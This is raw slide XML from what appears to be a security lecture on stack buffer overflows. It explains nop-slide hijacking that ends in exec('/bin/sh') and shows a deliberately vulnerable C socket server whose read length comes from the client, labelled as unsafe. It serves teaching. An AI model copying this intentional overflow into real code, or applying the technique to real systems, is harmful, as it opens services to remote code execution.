        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121663" y="3902582"/>
            <a:ext cx="2337499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exception handlers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF07FEF-6D31-7542-B2E2-3F3B1F283A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029890" y="2264109"/>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B1049E17-F31F-3940-9DAD-6756743D537F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8427601" y="2285641"/>
            <a:ext cx="987771" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>old rbp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10376265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Effectuating hijacking through nop slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1692911"/>
            <a:ext cx="11582400" cy="466344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If str comes from a remote program, the attacker does not know the exact  location of the return address.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Nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor eax, eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc ax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Guess approximate stack location when vulnerable is called.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Insert “nop slide” at higher addresses so return address points into nop slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Insert program code you want to execute on buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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Example program:  exec(“/bin/sh”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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Now attacker has shell!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37194933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buffer overflow target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="1354668"/>
            <a:ext cx="11104881" cy="2991198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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adapted from a tutorial by s3sc&amp;man</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stdio.h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stdlib.h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string.h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&lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>types.h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&lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket.h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netinet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in.h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unistd.h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signal.h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#define BUFFER_BOUNDARY_SIZE 1024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#define HEADER_SIZE 4</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Warning: DO not use this code, it has a buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>verflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> vulnerability</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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vuln_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(int </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char buffer[BUFFER_BOUNDARY_SIZE];</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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to_read</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read(</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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, HEADER_SIZE);</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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = read(</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buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to_read</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("Read: %d bytes\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_bytes</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("Incoming message: %s\n", buffer);</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39546669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buffer overflow target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="1244310"/>
            <a:ext cx="11104881" cy="2991198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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int main (int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2)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("Usage: %s [port]\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0]);</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exit(1);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int port, </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socklen_t</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cli_len</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struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr_in</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cli_addr</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 socket(AF_INET, SOCK_STREAM, 0);</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if (</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&lt; 0)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("Error opening a socket\n"); exit(1);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port = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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serv_addr.sin_family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = AF_INET;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serv_addr.sin_addr.s_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = INADDR_ANY;</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serv_addr.sin_port</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htons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(port);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if (bind(</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(struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serv_addr</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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serv_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)) &lt; 0)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("Error on bind()\n");</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exit(1);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("Waiting for a connection...\n");</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listen(</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1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32212183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buffer overflow target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="1354668"/>
            <a:ext cx="11104881" cy="2991198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while(1)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cli_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cli_addr</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 = accept(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sock_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, (struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cli_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cli_len</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if (</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 &lt; 0)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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Error on accept()\n");</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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Connection accepted...\n");</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vuln_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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char message[] = "Hello there!\n";</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write(</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 message, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
